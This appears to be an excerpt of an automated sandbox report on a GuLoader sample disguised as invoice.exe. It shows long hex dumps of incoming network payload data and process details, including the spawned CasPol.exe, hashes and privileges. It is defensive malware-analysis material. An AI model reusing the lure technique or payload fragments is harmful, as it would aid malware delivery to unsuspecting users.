2023-03-17 13:34:27 UTC	111	IN	Data Raw: 96 e5 13 1f 01 83 af b6 8b f4 49 d9 4c c1 15 61 e2 44 1c 96 f4 6b 55 2f f5 fd 14 96 11 57 48 ff 17 76 8f 96 38 9e e1 88 36 5a 24 d8 7e cc d4 30 88 3b ee 99 12 96 32 72 ab d5 05 49 a6 f0 9b f2 0a 28 93 bf f6 60 c7 3a d6 d6 6f 34 de aa 0a d7 c0 d8 0d 10 52 91 13 b4 16 96 6e da 40 76 df f7 e9 c2 e4 ff 21 2e a0 ca 10 22 13 5b 3a 2b 39 a6 39 56 45 65 91 2c 76 c8 4a d2 0d bd 25 39 37 46 b3 14 d8 0d fd d5 02 bd 3d fd 33 67 96 b9 bf 37 dc f7 33 38 97 b1 e3 67 c2 00 dc ae f4 51 79 18 f5 70 bd 6b 7e 5c 9e f3 3b 37 79 0a 59 c9 26 9d e9 bc 9a 2b a1 84 bb ce 54 6e 4d 0d da 97 bc 07 aa 89 3a ff e5 cc 96 6d 75 7d 8c dc e3 d0 57 d3 39 4e 77 8c 1d 0e a6 95 97 92 b2 fc 21 dc 68 ee 0c d3 c5 7b 93 b2 9e a8 74 1f 2b eb 15 f3 05 41 d4 26 4c b5 ef 10 1d f9 75 4e 73 c7 13 9a c0 Data Ascii: ILaDkU/WHv86Z$~0;2rI(`:o4Rn@v!."[:+99VEe,vJ%97F=3g738gQypk~\;7yY&+TnM:mu}W9Nw!h{t+A&LuNs
2023-03-17 13:34:27 UTC	112	IN	Data Raw: 12 70 1c c2 8c 5c 02 15 d8 3e bc 70 e1 8d 2e 46 b2 51 f4 74 b5 1e 21 02 eb 46 28 28 e6 59 9f 5e 8b 57 8a bf c1 7b 9e 86 5a 38 7b bb c5 6a c6 82 d4 29 d3 aa c3 9b cc 03 f9 26 7a 96 a9 20 a6 be 81 97 78 9d 44 19 57 66 2d 82 77 10 47 39 08 d4 9b a2 69 5a 59 8e 82 4e 12 6a c7 28 6c 29 ab ee a4 fd f8 9a 3b 8c 49 24 f4 e8 a6 8b a9 cc c6 53 e8 63 7c 6f e6 21 ee e2 71 5e cf ce a6 bc 11 b0 0e 0d aa 61 35 44 58 13 c8 80 2f d5 53 12 af 1f 6e 6b 69 66 76 3b 5e 60 b2 cf f9 7b fa b2 fc bc fa 55 f7 d9 34 64 12 7e db 91 42 4a 4e 7c 6f ad 50 7e e8 9c df 36 fa ab 52 21 c8 af ad 54 7e 8b e7 81 80 df aa 3b 98 b2 89 f8 b6 bb 9d ca b9 2b 36 60 bd 8c 7b 2a 45 60 d1 97 33 39 b4 c6 ce 1c 4a c2 d6 e9 49 5a 19 03 34 0b 04 83 0f e7 20 a8 cf 4a 9e 98 2f 4a 6d ea 04 ce d9 c9 8d f1 c4 Data Ascii: p\>p.FQt!F((Y^W{Z8{j)&z xDWf-wG9iZYNj(l);I$Sc\|o!q^a5DX/Snkifv;^`{U4d~BJN\|oP~6R!T~;+6`{*E`39JIZ4 J/Jm
2023-03-17 13:34:27 UTC	113	IN	Data Raw: e4 8b 14 b0 65 b3 dc 99 71 10 5c 80 11 d0 1f 28 3d f7 af 5e 73 0e 6f 3c af 54 fc b5 c9 de 47 c4 f0 dd 92 35 22 38 62 b6 f0 c8 6e f6 e7 76 df 8a 88 f1 0c 1c 09 e2 bd c3 d0 6e de 58 44 03 a1 7c 23 a6 c7 9a bf b8 d1 0c f1 45 c3 21 fe e8 5b be e1 b3 c6 59 7e 06 80 35 96 56 61 ba 72 2d c7 84 71 78 9a 55 25 27 a2 61 e8 a1 7a 3c Data Ascii: eq\(=^so<TG5"8bnvnXD\|#E![Y~5Var-qxU%'az<
2023-03-17 13:34:27 UTC	113	IN	Data Raw: 16 55 a8 58 d3 18 9a 6a 91 9d 48 e9 6c 7f fc 67 b7 b3 20 56 a3 8a 71 74 6a 01 9a b6 19 06 5a d5 21 9e d6 e9 23 2b 1c fa 4d 9f 8e d2 6e c6 56 41 ca a8 3e 39 01 8d 0a 36 6e 74 21 82 0d c5 12 e2 ff 0e 08 d0 0e f9 e0 93 ad 81 3f a9 d0 95 b3 2b e8 b8 cd fc d0 73 65 54 e5 4a 10 21 00 12 6d 3c 88 47 50 6f 24 03 a6 31 fe 8f 3c 93 06 09 fe 96 6e 9b 5d 99 16 02 69 ea cd 9c ea 73 ad 8e d2 74 26 10 ac 43 a0 73 20 00 60 9d 02 e4 24 4c 51 6c d3 f5 e0 00 24 04 08 36 e7 c3 24 99 8a 16 1c a8 a1 be 70 f8 ef 0e be 5f 75 88 16 4d d7 5a 47 35 5d 55 f5 11 6a d3 de 3b c4 fe ac f5 03 e4 07 6c d3 71 59 62 a5 69 77 97 9d ae d2 36 5b ed ff 39 83 fd 7c 70 5e c2 c2 5c 73 15 b7 3e c3 70 84 8d 1f 46 ae 51 e4 74 a9 1e 19 02 9e 46 1d 28 f1 59 82 5e c6 57 f4 bf 80 7b a3 86 49 38 48 bb ef Data Ascii: UXjHlg VqtjZ!#+MnVA>96nt!?+seTJ!m<GPo$1<n]ist&Cs `$LQl$6$p_uMZG5]Uj;lqYbiw6[9\|p^\s>pFQtF(Y^W{I8H
2023-03-17 13:34:27 UTC	114	IN	Data Raw: 76 30 47 50 bd 48 c4 f7 b2 b4 dc d0 69 57 7d c7 6f 02 3c 73 fd a0 c2 f1 63 fc d9 81 91 83 e1 90 c4 ea f8 6b 1c aa 76 11 fc 25 10 87 d4 30 b4 3c 3d 17 a2 b7 25 39 3d ab db ad dc d2 34 f7 ef 78 59 64 ec 8f c3 df 9a 3b bd 2d e1 76 27 89 36 79 f9 86 06 75 15 d8 dd 39 a1 3c 04 65 8b 3a 17 a2 e4 15 93 cc 82 3b 12 2e b7 38 bf bb 44 fd 01 80 b9 76 97 1d 33 ed 85 77 19 c9 b4 f6 b3 30 7c b3 fe a5 60 32 b5 fa d6 4c 34 c9 aa 06 d7 db d8 16 10 44 91 3e b4 55 96 48 da 4c 76 f0 f7 ce c2 b2 ff 64 2e c8 ab 3c 22 4e 5b 65 2b 7b a6 4e 56 6b 65 8d 2c 64 c8 4d d2 1c bd 3e 39 05 46 96 14 f6 0d ff d5 1a bd 2a fd 23 67 88 b9 86 37 fa f7 1c 38 b1 b1 f9 67 90 00 f7 ae f8 51 64 18 e1 70 8c 6b 6c 5c 92 f3 38 37 6f 0a 49 c9 38 9d c1 bc 82 2b 88 84 b2 ce 52 6e 51 0d d8 97 e8 07 b2 89 Data Ascii: v0GPHiW}o<sckv%0<=%9=4xYd;-v'6yu9<e:;.8Dv3w0\|`2L4D>UHLvd.<"N[e+{NVke,dM>9F*#g78gQdpkl\87oI8+RnQ
2023-03-17 13:34:27 UTC	116	IN	Data Raw: 04 44 36 ca b4 04 99 ad 16 1c a8 ac be 0e f8 ac 0e f2 5f 33 88 5e 4d da 5a 33 35 7c 55 fa 11 68 d3 de 3b c4 fe fe f5 77 e4 58 6c 9f 71 17 62 e3 69 3f 97 c2 ae df 36 5b ed df 39 a4 fd 17 70 1c c2 9a 5c 30 15 fe 3e ee 70 c8 8d 2b 46 ae 51 fc 74 fd 1e 5d 02 eb 46 18 28 8e 59 e7 5e e3 57 a1 bf d3 7b 9e 86 01 38 07 bb 80 2d ff 82 f0 29 de aa df 9b d3 03 e6 26 7a 96 b0 20 ba be 83 97 63 9d 0a 19 33 66 08 82 62 10 52 39 35 d4 df d9 01 5a 35 8e ce 4e 4a 6a 86 28 35 29 da ee c5 fd ba 9a 71 8c 00 24 c9 e8 e8 8b 8c cc cc 53 f9 63 3d 6f b2 58 91 e2 1a 5e 81 ce e0 bc 59 b0 51 0d a7 61 35 44 58 13 c8 80 22 d5 2d 12 ec 1f 22 6b 2f 66 1e 3b 74 60 a0 cf e4 7b ee b2 f1 bc f5 55 b2 d9 00 64 40 7e 99 91 02 4a 59 7c 62 ad 3e 7e aa 9c 91 36 94 ab 30 21 a1 af e6 54 1b 8b da 81 Data Ascii: D6_3^MZ35\|Uh;wXlqbi?6[9p\0>p+FQt]F(Y^W{8-)&z c3fbR95Z5NJj(5)q$Sc=oX^YQa5DX"-"k/f;t`{Ud@~JY\|b>~60!T
2023-03-17 13:34:27 UTC	117	IN	Data Raw: 5f f8 00 bb 23 1d 83 92 ba e2 88 ab 44 5c c9 ab 60 41 7d 30 53 4e 4b d4 0c 76 19 48 e2 01 13 e5 3e ff 79 90 4c 14 59 6b d4 39 84 00 90 df 6d fb 59 92 46 12 fa d7 da 53 af d7 6f 7e d4 c3 8b 08 b0 6d b3 94 99 71 10 53 80 1f d0 06 28 39 f7 87 5e 56 0e 07 3c c3 54 d5 b5 d3 de 58 c4 f0 dd f4 35 4e 38 0c f3 cb c8 5f f6 f9 76 90 8a a1 f1 31 1c 28 e2 af c3 b5 13 a1 58 6e 03 c8 7c 6f a6 9e 9a f3 b8 a0 0c 98 45 8b 21 b5 e8 1a be c7 b3 c4 59 6b 06 b7 35 bf 56 2e ba 41 2d dc 84 7e 78 d9 55 0a 27 a6 61 ee a1 3b 3c 3b 22 88 58 f4 18 9a 6a 91 9d 48 e9 6c 7f fc 67 97 b3 07 56 c8 8a 3e 74 4c 01 9a b6 1c 06 11 d5 02 9e 84 e9 18 2b 03 fa 16 9f cd d2 53 c6 5a 41 ce a8 7f 39 40 8d 43 36 2a 74 01 82 2a c5 77 e2 bd 0e 56 d0 77 f9 d0 93 cb 81 51 e4 f9 95 9e 2b e4 b8 9f fc f9 73 Data Ascii: _#D\`A}0SNKvH>yLYk9mYFSo~mqS(9^V<TX5N8_v1(Xn\|oE!Yk5V.A-~xU'a;<;"XjHlgV>tL+SZA9@C6twVwQ+s
2023-03-17 13:34:27 UTC	118	IN	Data Raw: 3f 34 ea 0e 41 03 86 c6 89 d4 d5 c1 16 f7 69 79 a7 95 c8 d7 c8 b0 ad 74 8d 58 5c 55 b2 0d 9c de 10 60 ac e1 cd 83 74 9b 7c 30 8a 60 21 18 75 55 e5 e9 02 b9 7e 77 82 45 43 02 44 0a 7b 57 54 01 f4 93 96 09 8f d7 92 df 9e 30 d7 b7 72 10 60 0d b4 f4 2f 38 74 0a 4f c8 13 0c 87 ef bc 18 b9 d3 3d 4c ab c3 a0 54 7d c3 af ee ef ac d9 4f ec b2 ba a8 96 da 9c e0 e5 58 43 60 f7 dc 14 45 3f 12 9c e3 56 39 a5 cb a7 16 2b ef 8a c4 1c 77 6b 2e 55 26 6a ae 53 ca 75 85 bc 6a fb cb 5d 24 4d 8b 40 a5 b8 ac f9 d1 a5 30 3f 62 30 47 50 ab 48 c3 f7 a3 b4 f2 d0 05 57 3f c7 25 02 78 73 be a0 cf f1 0a fc 95 81 c8 83 8d 90 ce 6a 3f 66 73 a0 03 3c 92 08 74 aa f4 1d f2 11 4f 3a cd 9a 48 14 07 8b fb fe 9a bc 5d 96 83 13 3c 01 b6 af aa 8b f6 49 d1 4c 80 15 2a e2 3c 1c f8 f9 4e 55 7a f5 Data Ascii: ?4AiytX\U`t\|0`!uU~wECD{WT0r`/8tO=LT}OXC`E?V9+wk.U&jSuj]$M@0?b0GPHW?%xsj?fs<tO:H]<IL*<NUz
2023-03-17 13:34:27 UTC	119	IN	Data Raw: 90 56 35 ba 6f 2d f1 84 10 49 bb 55 0d 27 83 61 dc a1 1d 3c 73 55 cf 58 b5 18 fa 6a ec 9d 34 e9 13 7f 85 67 ec b3 7d 56 bd 8a 47 74 2d 01 c7 b6 49 06 4c d5 50 9e 9c e9 75 2b 71 f9 5a 9f af 91 79 c6 53 41 d0 a8 7f 39 38 8d 1d 36 62 74 5e 82 27 c5 0a e2 e2 0e 14 d0 1c f9 b3 93 e1 81 5b e4 ac 95 da 2b a0 b8 85 fc 9f 73 20 54 b3 4a 59 21 0c 12 57 3c a9 47 46 6f 33 03 ea 31 f0 8f 52 93 4e 09 8a 9d 6e 9b 67 99 26 02 69 ea d9 9c 8b 6c a3 8e 8e 74 2f 10 8b 43 dd 73 32 00 7c 9d 59 e4 37 4c 0a 6c a4 f5 fc 00 2b 04 5d 36 9a b4 29 de 8d 16 3b a8 a1 be 70 f8 ef 0e be 5f 75 88 16 4d d7 5a 4a 35 2e 55 c8 11 65 d3 d4 3b ca fe e9 f5 77 e4 21 6c c0 71 5b 62 ad 69 79 97 8a ae 80 36 56 ed ff 39 83 fd 7c 70 5e c2 c2 5c 73 15 b7 3e e3 70 83 8d 53 46 c0 68 d7 74 a8 1e 08 02 d0 Data Ascii: V5o-IU'a<sUXj4g}VGt-ILPu+qZySA986bt^'[+s TJY!W<GFo31RNng&ilt/Cs2\|Y7Ll+]6);p_uMZJ5.Ue;w!lq[biy6V9\|p^\s>pSFht
2023-03-17 13:34:27 UTC	121	IN	Data Raw: 8f 75 dd bc 24 fb fc 5d 2f 4d 98 40 ac b8 a0 f9 83 a5 00 3f 4c 30 76 50 ba 48 c7 f7 a0 b4 e9 d0 49 57 77 c7 7b 02 09 73 93 20 67 fc 27 f6 b8 ac e5 ae 80 bd c4 47 79 4b 1c 8d 76 11 fc 25 10 8a d4 4e b4 7f 3d 5b a2 f1 25 71 3d ab db aa dc ce 34 f7 ef 70 59 6a ec ca c3 f9 9a 69 bd 61 e1 38 27 cf 36 31 f9 d9 06 78 15 d8 dd 39 a1 1c 04 42 8b 51 17 e0 e4 4d 93 8f 82 52 12 04 b7 38 bf a6 44 e7 01 83 b9 28 97 1d 33 ff 85 6d 19 d3 b4 f5 b3 6e 7c f6 fe 84 60 25 b5 e3 d6 5b 34 df aa 69 d7 b8 d8 2c 10 4f 91 40 b4 2b 96 3a da 03 76 82 c2 f7 c2 e7 ff 3e 2e a0 ca 0c 22 11 5b 32 2b 17 a6 5f 56 7c 65 83 2c 5e c8 51 d2 17 bd 27 39 3c 46 ad 14 d8 0d c0 d5 1f bd 36 fd 20 67 93 b9 b6 37 ca f7 1c 38 d4 31 0a 6a b0 0a b3 83 99 7c 10 35 80 5d d0 46 28 71 f7 de 5e 1a 0e 2a 3c 9a Data Ascii: u$]/M@?L0vPHIWw{s g'GyKv%N=[%q=4pYjia8'61x9BQMR8D(3mn\|`%[4i,O@+:v>."[2+_V\|e,^Q'9<F6 g781j\|5]F(q^*<
2023-03-17 13:34:27 UTC	122	IN	Data Raw: 10 d0 43 ed 22 02 00 68 9d 04 e4 24 4c 12 6c ff f5 e8 00 3c 04 0d 36 c7 b4 79 99 f2 16 5e a8 e8 be 28 f8 a1 0e e7 5f 31 88 54 4d 94 5a 14 35 52 55 cb 11 6a d3 d9 3b c4 fe ac f5 1a e4 1a 6c dd 71 54 62 92 69 42 97 9d ae 9d 36 10 ed bb 39 c2 fd 34 70 00 c2 ef 23 53 15 90 3e e3 70 a3 8d 74 46 ec 51 bc 74 ea 1e 50 02 93 46 7b 28 d0 59 83 5e ca 57 a5 bf c5 7b ca 86 6f 38 55 bb e0 6a c0 82 d9 29 d7 aa c4 9b 80 03 a0 26 0b 96 c8 20 e4 be cb 97 3c 9d 07 19 5a 66 64 82 1c 10 75 39 06 d4 ee d9 0a 5a 37 8e 8f 4e 79 6a 98 28 2e 29 eb ee b3 fd f5 9a 46 8c 08 24 cb e8 ad 8b 85 cc c2 53 e2 63 32 6f bf 21 96 e2 58 5e c3 ce be bc 00 b0 46 0d aa 61 19 5d 3b 13 b6 80 51 d5 21 12 d1 1f 2b 6b 31 66 0f 3b 30 60 9b cf e1 7b e1 b2 92 a5 ce 55 85 d9 3d 64 27 7e e6 91 6e 4a 39 7c Data Ascii: C"h$Ll<6y^(_1TMZ5RUj;lqTbiB694p#S>ptFQtPF{(Y^W{o8Uj)& <Zfdu9Z7Nyj(.)F$Sc2o!X^Fa];Q!+k1f;0`{U=d'~nJ9\|
2023-03-17 13:34:27 UTC	123	IN	Data Raw: f0 69 43 b5 8a d6 29 30 b3 aa 64 d7 b6 dc 64 10 20 92 35 a9 5a 94 06 d2 2b 76 87 fe aa da 86 f1 4d 2b c9 c8 69 3a 74 50 53 2d 42 be 02 4b 1c 6d f2 24 1a c1 3e d7 70 a5 42 24 5c 4e dc 1a 84 04 99 cd 75 b3 49 e5 5e 6f e7 bc d2 3e ab f7 6e 31 cc a2 8b 6d b9 18 ae ab 91 41 01 48 9d 75 d8 76 2d 54 e7 fb 57 24 0e 00 35 d1 49 98 bd ac cf 7b d9 81 d5 d3 30 66 28 05 be 92 e8 05 f7 87 7e fd 8c c6 f8 4d 1f 7c ff d9 de d5 0e d6 5c 6e 02 8d 72 00 86 ef 87 97 a5 f9 11 d9 58 eb 3c d6 f5 7e ba 92 b2 a0 41 19 26 e8 2d fd 58 4f b2 06 2e ad 9c 0d 7d e9 4d 48 07 c5 7c 9f b9 54 3b 1b 54 98 5d e3 05 b2 62 bc 9d 70 fb 1c 7e c3 03 bf b3 2b 58 f8 8f 1b 74 1d 0f fc b8 79 06 7b d7 69 9b a4 e8 51 2e 7f fd 77 9d a0 cf 3d db 3a 53 bc af 5d 29 7c fd 60 26 16 04 34 92 16 a9 52 f2 81 7e Data Ascii: iC)0dd 5Z+vM+i:tPS-BKm$>pB$\NuI^o>n1mAHuv-TW$5I{0f(~M\|\nrX<~A&-XO.}MH\|T;T]bp~+Xty{iQ.w=:S])\|`&4R~
2023-03-17 13:34:27 UTC	124	IN	Data Raw: 2a 11 76 66 6b 82 16 10 33 39 30 d5 9b 92 29 33 30 fc c0 3d 50 0c 9e 06 17 40 f5 9b e8 91 86 ee 63 e8 00 4b 89 ad ac e2 bc a3 df 20 a3 30 39 1b c6 48 f2 85 63 1a c9 bd a4 db 1a d5 0e 23 d9 04 6c 30 1c 7d 82 f3 51 bc 10 75 ee 7a 05 02 28 03 3c 5e 3a 05 86 ae e2 14 fd ba a3 8b b0 65 f9 ea 5c 54 60 7e a4 90 2f 41 39 05 61 fe 76 0a f3 f5 d2 51 ca ab 3d 27 8b ae a1 45 f4 5a a7 80 ef df d9 3b ec b2 b3 f4 97 bb 9b d8 b5 7b 2f 0f 99 df 14 2a 2d 61 9c 9a 05 5a a2 aa c8 7b 5f ab e7 8c 6e 28 19 03 55 1a 6b 83 5f a4 19 d8 ce 2f 8b ec 34 27 28 98 32 ce b8 c5 f8 f1 a2 07 53 60 42 63 00 bb 48 a8 fc c7 b4 86 bb 69 1b 46 8e 65 02 55 7e 92 a0 ea a5 77 af eb e4 8b e7 f3 90 c4 73 78 66 08 f5 18 6c 8e 67 64 cf b7 69 dd 7e 53 6e f2 c9 76 71 53 ef a8 fe dc ac 35 96 e4 43 2b 6e Data Ascii: vfk390)30=P@cK 09Hc#l0}Quz(<^:e\T`~/A9avQ='EZ;{/-aZ{_n(Uk_/4'(2S`BcHiFeU~wsxflgdi~SnvqS5C+n
2023-03-17 13:34:27 UTC	125	IN	Data Raw: 93 a4 fb 0b df 58 eb 2f ce ed 7e 9e b2 a1 29 a0 3a 01 fa 37 f1 44 c0 47 3b 28 a7 05 75 6a 78 44 4c 35 45 60 87 a4 48 bd be 47 07 5d fc 0a 36 7b be 93 6b fb c0 6e c1 67 bd af 36 44 fc 84 03 68 02 0f e9 a4 64 1b 78 d2 47 9d a5 f4 49 23 79 fc 57 9e af c0 ba cb 3a 61 bc ba dd 28 68 ad 6e 24 85 61 24 a2 04 c4 48 63 f5 00 75 d8 6f eb 58 8e 8c 93 bc fd 89 b5 f1 2a 93 b8 bb fc be 7b 06 52 ac 4b 64 33 ef 33 37 1c dc 46 31 ed 40 1d d3 3d d0 81 76 91 76 8b af 84 8d b2 13 1b 7f 13 8e db ba 1e ae 61 5a a7 ac f6 7f 02 71 52 e9 53 4f 12 85 a8 6e c4 4a 5e f3 55 90 f5 85 0e 5e 0a 67 38 e2 94 29 8b 02 57 34 88 8c af df c9 c7 2e 91 5e 50 80 33 4d fb 48 e5 18 1c d7 de 1d 2b d0 b4 2a 23 b7 9d 77 1e f5 f7 49 b4 71 3b 70 4c 24 1c b4 e8 a1 f0 24 f7 10 cf 3c bc 7c 34 62 f2 d3 ed Data Ascii: X/~):7DG;(ujxDL5E`HG]6{kng6DhdxGI#yW:a(hn$a$HcuoX{RKd337F1@=vvaZqRSOnJ^U^g8)W4.^P3MH+#wIq;pL$$<\|4b
2023-03-17 13:34:27 UTC	127	IN	Data Raw: 86 56 31 cc da b5 05 25 df 96 f4 12 47 79 1a 48 09 68 87 53 e6 7d b4 ba 4a f9 84 41 58 54 fa 40 c6 b9 d5 eb e8 ab 79 23 0d 3e 3b 42 d1 4a aa fd c1 bc 8e de 2b 59 1a c9 0a 00 51 53 92 a3 ea ed 20 f0 a4 93 64 36 9d 95 d9 6f 64 63 0e 22 ab 21 f9 15 15 b8 55 a4 a9 14 33 28 23 8b 2f 14 3e 8a c9 7f 61 ae b5 2b e7 15 79 00 ed be 41 6a a3 4e a7 42 ef 07 a5 0b 24 9e 14 e6 84 b8 07 77 30 06 23 fc 0a 46 85 19 19 92 e1 2a 11 50 90 b4 e3 26 a5 fc 0e c6 c6 79 03 fc 3b a3 85 bf c2 a9 97 87 a8 b4 36 6a b1 18 fd 82 f8 d6 61 55 37 67 d8 30 33 b6 b8 e6 3e bc da 76 92 cd 83 b1 59 4d 14 ed d2 2b 7e 8b ff a6 d0 09 ee 42 0e c8 d8 e2 d7 75 01 54 11 45 ba 0e 5e 11 6d ea 24 0f da 27 dc 64 a1 51 25 44 48 c9 06 9d 10 92 c9 63 a1 4b e4 48 7a e6 a4 c6 2a a1 ea 7d 21 c8 bf 97 75 a9 0e Data Ascii: V1%GyHhS}JAXT@y#>;BJ+YQS d6odc"!U3(#/>a+yAjNB$w0#FP&y;6jaU7g03>vYM+~BuTE^m$'dQ%DHcKHz}!u
2023-03-17 13:34:27 UTC	128	IN	Data Raw: 09 8a 96 0f 9b 01 99 52 02 0c ea ab 9c 8b 73 d8 8e be 76 52 00 f0 43 ec 53 4f 00 87 85 6b e4 4a 1c 71 6c 17 f5 81 00 50 04 69 36 e7 b4 29 99 80 16 31 a9 8c bf 5d f8 c2 36 93 5f d8 88 3b 4d fa 5a 67 35 0e 55 9b 11 0b d3 b5 3a a1 fe 8c f5 57 64 75 6c b2 71 3a 62 ce 69 12 97 ef ae f2 36 76 ed d2 38 ae fc 51 70 73 aa ef 5c de 15 9a 3e ce 70 8e 8d 59 46 c1 51 91 74 c7 1f 7d 02 be 46 5b b8 83 59 ed fe 8b 55 ce 13 a3 7b ea 86 3b 38 27 bb 81 6a a3 ce 96 2b b2 f1 ba 9b a0 03 8d 26 26 96 e5 20 c9 12 e5 a3 11 9d 2a 4f 77 35 69 dd 16 46 33 7c 69 86 9b 8a 64 13 53 c1 af 00 3f 35 ea 61 41 67 86 a8 89 b2 d5 9a 16 8c 69 99 a3 07 36 8b c8 cd ad 53 8d 62 5c 6f b2 21 9c e2 10 5f ac ce cd bc 74 8f 7c 0d 8a 61 18 44 75 17 e5 80 02 d4 7e 12 82 1f 43 6b 44 66 7b 3b 54 60 f4 cf Data Ascii: RsvRCSOkJqlPi6)1]6_;MZg5U:Wdulq:bi6v8Qps\>pYFQt}F[YU{;8'j+&& *Ow5iF3\|idS?5aAgi6Sb\o!_t\|aDu~CkDf{;T`
2023-03-17 13:34:27 UTC	129	IN	Data Raw: a6 31 c0 89 3c a7 1f 13 c5 e4 68 7c 9b 96 d6 ca 4b 0c e3 92 9f 03 26 c1 e3 b9 47 1a da da 14 f5 9d e6 69 1a 00 b1 0f c0 2d e3 73 ae 6a 18 e5 98 9a ba e5 93 2a 5d f4 e8 15 50 13 61 20 48 23 c3 61 37 6a 48 8f 45 70 ba 51 a1 16 db 38 14 3a 29 b9 2e e5 7e fd fb 1b 8f 7b c3 4b 6d da 99 fa 17 93 84 0a 5b a1 c3 e2 13 c9 3e be a4 Data Ascii: 1<h\|K&Gi-sj*]Pa H#a7jHEpQ8:).~{Km[>
2023-03-17 13:34:27 UTC	129	IN	Data Raw: b9 71 30 38 a0 50 ec 19 4d 2d 82 96 2d 43 6b 6e 6c bb 3d eb dc d0 bb 4c a1 f7 fd b6 58 02 56 7e 8b b5 bd 75 98 b3 05 9c e2 a9 9c 0c 6f 50 8f b5 a0 a2 7c a0 37 28 77 a1 1f 61 cb d0 fb e1 d5 d2 7a ef 67 d0 2c d9 c8 5b 9e 92 93 88 79 3f 3a ca 18 de 76 14 fb 65 0d f8 e5 7e 11 9f 30 3d 53 e7 2e ea d5 33 53 55 26 88 52 de 38 97 4a 9c bd 45 c9 61 5f f1 47 9a fa 4c 76 9c e5 6b 54 68 60 9a c2 5d 72 15 f5 04 f6 c5 87 2b 4e 51 8e 1f fa 8e 85 51 a8 5b 2e cb db 7f 6c 1e e8 1c 16 46 17 4f ed 72 ab 2e c2 d3 61 15 a4 08 96 b6 b3 e1 e4 48 81 e0 b5 82 4e f0 d4 de 9f da 53 7c 3c e9 6a 68 2b 4d 32 11 1c fd 67 03 4f 61 23 f4 11 fe fd 1d e2 12 6c f9 e2 6a ff 44 e1 37 61 79 9e c2 f3 e5 3f bd f8 db 18 72 7e 9f 27 89 53 38 69 73 f5 4b 8b 24 29 51 03 f1 d5 f5 68 35 24 0f 59 8b d8 Data Ascii: q08PM--Cknl=LXV~uoP\|7(wazg,[y?:ve~0=S.3SU&R8JEa_GLvkTh`]r+NQQ[.lFOr.aHNS\|<jh+M2gOa#ljD7ay?r~'S8isK$)Qh5$Y
2023-03-17 13:34:27 UTC	130	IN	Data Raw: a2 9f ac b1 94 75 f7 f9 52 44 40 42 95 bc 02 76 07 09 3f dd 7c 0c f3 f9 d8 79 ea 8b 74 45 96 8d db 31 46 bb 9e b0 db ea ee 16 dd 87 87 ce bb 8f af f0 d0 06 22 55 98 e9 39 1a 0f 58 f8 f2 33 5c e3 a2 94 7a 1b bf a8 c9 33 64 46 2e 6b 06 60 8e 59 c7 55 88 9c 6a db a4 7c 67 60 ca 17 a7 d6 ad 96 86 d6 44 08 30 1d 0b 6e c5 42 88 d7 e6 94 a0 f0 19 76 3f ea 34 71 20 03 e3 cf 90 85 42 98 f7 d2 c5 ca e4 ad e6 11 4a 53 2d 93 4e 5e c5 69 3d 9f b0 24 82 3c 09 5c c0 fe 08 2c 58 b9 bf d3 bd 8e 00 a2 df 21 6b 34 8a 96 f0 ea e7 6b 9d 63 df 38 0a dc 3b 16 f4 fe 26 75 35 d5 fd 34 9d 30 29 65 ab 40 7e e1 80 57 e4 92 a2 0e 32 09 9a 40 b2 de 64 a8 21 ce 99 32 ab 1c 1e 86 b9 76 6c d6 c4 f4 c1 7e 19 f7 b1 a5 40 0e d1 b7 f4 52 00 da 98 02 e5 8a bd 57 3d 15 a2 51 8d 72 a2 34 ee 12 Data Ascii: uRD@Bv?\|ytE1F"U9X3\z3dF.k`YUj\|g`D0nBv?4q BJS-N^i=$<\,X!k4kc8;&u540)e@~W2@d!2vl~@RW=Qr4
2023-03-17 13:34:27 UTC	132	IN	Data Raw: 9c c9 31 5d 4d e9 07 57 6b 1b 4b f1 27 ed 0d 8b fe 6a 14 a7 09 d9 82 c3 ad e0 50 80 ac f9 91 5f e5 ca 96 dc 92 5e 36 59 86 6a 45 1d 4c 3f 1c 31 d7 67 03 53 25 66 a4 54 b0 eb 1d fd 04 70 b4 9b 05 bb 21 b9 72 3e 68 8f db f9 e5 17 bd e0 ca 35 21 63 95 2e 8e 1f 36 3e 0a 97 4b c4 6a 6c 51 4c ab 94 f2 73 35 69 0b 5a 9e fd 4d fc ee 62 58 dc f5 b3 57 d8 e2 2e b3 7f 78 a8 1b 6d da 2e 1e 45 6b 68 b9 66 62 bd 86 09 83 f3 86 d5 77 c4 55 4c 92 51 1a 42 ee 07 73 fa 8a 93 d0 7b 1f 8e a0 56 dd 92 37 04 5d 95 86 32 3a 7a ed 4d e0 33 e1 e0 34 29 af 7c d2 1b a9 6a 0f 6d d2 35 79 25 89 79 cd 7e 8b 77 ee 9f 80 5b ca f0 5e 4a 54 d2 ee 04 9e a0 84 07 82 84 86 b5 90 21 80 2c 06 b6 c5 00 e9 9e c6 b7 31 bd 5a 6b 18 05 0c f1 65 7f 41 78 1b b7 f3 b0 10 3f 30 fa da 3c 5a 57 c8 02 63 Data Ascii: 1]MWkK'jP_^6YjEL?1gS%fTp!r>h5!c.6>KjlQLs5iZMbXW.xm.EkhfbwULQBs{V7]2:zM34)\|jm5y%y~w[^JT!,1ZkeAx?0<ZWc
2023-03-17 13:34:27 UTC	133	IN	Data Raw: 3d 3a a2 9a 25 14 3d 8b Data Ascii: =:%=

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: invoice.exePID: 4636, Parent PID: 4588

General

Target ID:	1
Start time:	14:32:12
Start date:	17/03/2023
Path:	C:\Users\user\Desktop\invoice.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\invoice.exe
Imagebase:	0x400000
File size:	861416 bytes
MD5 hash:	F111934675C34CCA18D9D76FC34A2E40
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.8704170676.000000000666B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 1520, Parent PID: 4636

General

Target ID:	5
Start time:	14:34:15
Start date:	17/03/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\invoice.exe
Imagebase:	0xb20000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

